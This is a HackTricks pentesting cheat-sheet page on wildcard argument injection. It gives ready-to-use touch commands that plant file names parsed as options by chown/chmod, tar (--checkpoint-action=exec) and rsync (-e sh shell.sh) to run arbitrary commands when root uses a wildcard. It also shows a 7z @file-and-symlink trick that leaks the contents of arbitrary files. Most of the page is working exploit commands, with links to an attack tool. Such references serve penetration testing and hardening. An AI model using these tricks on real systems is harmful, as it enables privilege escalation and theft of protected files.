HackTricks
Searchโ€ฆ
๐Ÿ‘ฝ
Network Services Pentesting
Wildcards Spare tricks
Support HackTricks and get benefits!

chown, chmod

You can indicate which file owner and permissions you want to copy for the rest of the files
1
touch "--reference=/my/own/path/filename"
Copied!
You can exploit this using https://github.com/localh0t/wildpwn/blob/master/wildpwn.py (combined attack) __More info in https://www.exploit-db.com/papers/33930โ€‹

Tar

Execute arbitrary commands:
1
touch "--checkpoint=1"
2
touch "--checkpoint-action=exec=sh shell.sh"
Copied!

Rsync

Execute arbitrary commands:
1
Interesting rsync option from manual:
2
โ€‹
3
-e, --rsh=COMMAND specify the remote shell to use
4
--rsync-path=PROGRAM specify the rsync to run on remote machine
Copied!
1
touch "-e sh shell.sh"
Copied!
You can exploit this using https://github.com/localh0t/wildpwn/blob/master/wildpwn.py _(_rsync attack) __More info in https://www.exploit-db.com/papers/33930โ€‹

7z

In 7z even using -- before * (note that -- means that the following input cannot treated as parameters, so just file paths in this case) you can cause an arbitrary error to read a file, so if a command like the following one is being executed by root:
1
7za a /backup/$filename.zip -t7z -snl -p$pass -- *
Copied!
And you can create files in the folder were this is being executed, you could create the file @root.txt and the file root.txt being a symlink to the file you want to read:
1
cd /path/to/7z/acting/folder
2
touch @root.txt
3
ln -s /file/you/want/to/read root.txt
Copied!
Then, when 7z is execute, it will treat root.txt as a file containing the list of files it should compress (thats what the existence of @root.txt indicates) and when it 7z read root.txt it will read /file/you/want/to/read and as the content of this file isn't a list of files, it will throw and error showing the content.
More info in Write-ups of the box CTF from HackTheBox.
__
Support HackTricks and get benefits!
Copy link